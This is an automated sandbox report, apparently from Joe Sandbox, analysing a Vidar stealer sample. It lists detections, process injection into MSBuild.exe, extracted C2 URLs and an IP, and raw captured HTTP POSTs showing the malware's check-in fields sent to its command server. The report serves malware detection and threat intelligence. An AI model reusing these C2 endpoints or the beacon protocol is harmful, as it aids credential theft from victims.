Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lCVFGKfczi.exe

Overview

General Information

Sample name:lCVFGKfczi.exe
renamed because original name is a hash value
Original sample name:b84100c670bb19e92bfb62423048aa43.exe
Analysis ID:1528302
MD5:b84100c670bb19e92bfb62423048aa43
SHA1:592f3aef7ad93db6527d8e9d06b2ebbae1a51a79
SHA256:7823532217e8b06b102734023019188833b3e0ae711c3dc6f9cb437d8c48d14b
Tags:32exetrojan
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • lCVFGKfczi.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\lCVFGKfczi.exe" MD5: B84100C670BB19E92BFB62423048AA43)
    • MSBuild.exe (PID: 7420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • WerFault.exe (PID: 8020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "af641acce3f8c85bf2490a9b3aa972c5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: lCVFGKfczi.exe PID: 7404JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              3.2.MSBuild.exe.400000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                3.2.MSBuild.exe.400000.2.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  3.2.MSBuild.exe.400000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    3.2.MSBuild.exe.400000.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      0.2.lCVFGKfczi.exe.dedad8.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 5 entries

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 95.164.90.97, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7436, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-07T18:46:35.930186+020020442471Malware Command and Control Activity Detected95.164.90.9780192.168.2.449743TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-07T18:46:10.427105+020020518311Malware Command and Control Activity Detected95.164.90.9780192.168.2.449743TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-07T18:46:34.937813+020020490871A Network Trojan was detected192.168.2.44974395.164.90.9780TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: lCVFGKfczi.exeAvira: detected
                        Source: https://t.me/ae5edURL Reputation: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199780418869URL Reputation: Label: malware
                        Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "af641acce3f8c85bf2490a9b3aa972c5"}
                        Source: lCVFGKfczi.exeReversingLabs: Detection: 36%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: lCVFGKfczi.exeJoe Sandbox ML: detected
                        Source: lCVFGKfczi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2
                        Source: lCVFGKfczi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DD9ABF FindFirstFileExW,0_2_00DD9ABF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,3_2_00415142
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_00DEE385
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_00DEE385
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 95.164.90.97:80
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49743
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49743
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="mode"1------BFIIIDAFBFBKECBGDBGI--
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"2------KFHJJDHJEGHJKECBGCFH--
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"21------KFHJJDHJEGHJKECBGCFH--
                        Source: Joe Sandbox ViewIP Address: 95.164.90.97 95.164.90.97
                        Source: Joe Sandbox ViewASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
                        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
                        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00406963 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,3_2_00406963
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: lade.petperfectcare.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
                        Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com/
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com//(
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com/4
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com/T
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com/c
                        Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com/f
                        Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80
                        Source: MSBuild.exe, 00000003.00000002.1980647487.000000000048F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
                        Source: MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80/sql.dllineID:
                        Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80e
                        Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
                        Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                        Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                        Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC20210_2_00DC2021
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1A1BB0_2_00E1A1BB
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC729C0_2_00DC729C
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DDD39B0_2_00DDD39B
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E0E36F0_2_00E0E36F
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E064F50_2_00E064F5
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E0945D0_2_00E0945D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1A5590_2_00E1A559
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E086FD0_2_00E086FD
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DD572C0_2_00DD572C
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1A92B0_2_00E1A92B
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DCCAF20_2_00DCCAF2
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DDBB360_2_00DDBB36
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DD3C920_2_00DD3C92
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC1D790_2_00DC1D79
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E19D260_2_00E19D26
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E1AD130_2_00E1AD13
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DCFEF00_2_00DCFEF0
